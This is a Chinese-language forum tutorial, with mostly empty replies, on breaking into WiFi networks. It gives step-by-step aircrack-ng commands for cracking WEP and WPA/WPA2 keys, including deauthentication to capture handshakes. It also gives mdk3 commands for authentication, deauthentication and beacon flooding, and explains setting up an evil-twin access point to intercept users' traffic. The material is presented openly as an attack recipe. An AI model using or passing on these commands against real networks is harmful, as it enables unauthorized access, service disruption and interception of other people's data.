goback add

伪造AP获取WiFi密码

14075 点击·13 回帖
灯火互联
楼主
伪造目标ap,截取合法用户数据包,分析获得wifi密码
00x00 前因
现今社会,无线网络越渐发达,可是无论是企业还是自用wifi热点,对其安全性都并不是很重视,
另外一些恶意人员和商业间谍也在利用wifi进行恶意的攻击及资料窃取.

无线网络对于局域网来说是一个突破点,提到D.O.S,可能有人会说,
这是最流氓的一种攻击方式,但是我想说,这也是恶意攻击中最有效的一种方法.
工欲善其事必先利其器,为了达到目的,我们需要突破wifi的密码.
这次,我们先来总结下Linux下aircreak-ng系列获取密码的方法.长话短说,按步骤进行,都可以拿到你想要的!

00x01 介绍
不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别

iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0网卡
airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0
WEP

airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据
aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了

WPA/WPA2

airodump-ng –c频道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake提示获取成功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心

其实说到这里,hash破解速录会大大提升,只是利用字典制作hash table的时候需要花好长的时间,但是破解是aircrack的几十倍.
常见的几种DOS攻击:
Authentication Flood、Deauthentication Flood、Disassociation Flood、RFJamming、Association Flood等

00x02 利用工具
本次我们还是依赖于BT5下一款强大的工具,mdk3
现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了.
针对路由器,我们可以发动AuthenticationFlood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击,
又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,
AP就会自动断开现有链接,使合法用户无法使用无线网络

mdk3 mon0 a –a AP的MAC地址(BSSID)

图片:20121218013833255.gif


图片:20121218013833879.gif




可以看到发动的同时,有大量虚假的客户端对AP进行连接,这些client
MAC地址也都是随机伪造的

图片:20121218013834570.gif


a
此时我们可以通过-c来对指定的频道进行攻击,-a固定bssid进行攻击,-s控制发包速率.一般默认的是200个包/秒,
这样我们持续的攻击下去,无线网络在几分钟之内就会瘫痪,但是问题是,如果我们遇到一个能承载大量用户的AP客户端,那么我们该怎么办呢?
别急,下面我们就来使用当初我们获得handshake时候使用过的Deauthentication Flood,
记得么,当初我们使用aireplay-ng-0来发动使其断线来获取握手包,其实aireplay-ng即可发动,只要不控制发包数量,并随机频道即可,但是相比mdk3效率并不高.
这种攻击不是针对AP的,而是针对于client MAC.

mdk3 mon0 d

图片:20121218013834127.gif


攻击开始了

图片:20121218013834897.gif


可以看到,我的网络瞬间断断续续,当我停止后,网络恢复

图片:20121218013834567.gif


此时我们可以利用-s参数来加快发包速率.这种效率是非常高的,一般发动开始,client便开始断网.
另外我们可以使用-w(白名单) –b(黑名单)来添加我们的mac地址,这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响,
而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里.
伪造AP
首先我们需要一块支持AP的无线网卡,或者直接上无线路由器,或者做热点,做ap方法网上很多很多,
这个大家可以自己找下.


图片:20121218013835921.gif


图片:20121218013835994.gif




为了识别一个是假的,所以我没有去修改mac地址

可以看到,上面的无线网络是我自己用无线网卡制作的伪造AP,其名称,密码,加密方式,工作频道,工作模式与原AP完全一样,
原AP被攻击无法链接,我只能连接这个,在不知情的情况下,会以为原AP是伪造的,因为无法链接.
这个时候我们就可以来抓我们自己AP网卡的数据包了.之后就是分析数据包.

另外,我们还可以发动虚假AP信号进行干扰
1
mdk3 mon0 b –g –c 11 –h 7

图片:20121218013836777.gif


这个时候,我们就已经开始了对频道为11的AP进行大量干扰. 另外我们也可以对指定的网络发动

mdk3 mon0 b –n ESSID –g –c 11
对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道 其他的D.O.S大家可以自己研究研究

喜欢0 评分0
爱恨恢恢
沙发
     

回复(0) 喜欢(0)     评分
605701572
板凳

回复(0) 喜欢(0)     评分
605701572
地板

回复(0) 喜欢(0)     评分
hellod
4楼

回复(0) 喜欢(0)     评分
ffgui
5楼
这个能行?

回复(0) 喜欢(0)     评分
钦忆
6楼
 

回复(0) 喜欢(0)     评分
陈是珂
7楼
erdffv

回复(0) 喜欢(0)     评分
864642230
8楼
zenmegaode

回复(0) 喜欢(0)     评分
llh
9楼
     

回复(0) 喜欢(0)     评分
1913282992
10楼
好好好

回复(0) 喜欢(0)     评分
wd23010
11楼
真的假的 怎么什么也看不到

回复(0) 喜欢(0)     评分
chenbaisi
12楼
用户被禁言,该主题自动屏蔽!

回复(0) 喜欢(0)     评分
xjn134506
13楼
用户被禁言,该主题自动屏蔽!

回复(0) 喜欢(0)     评分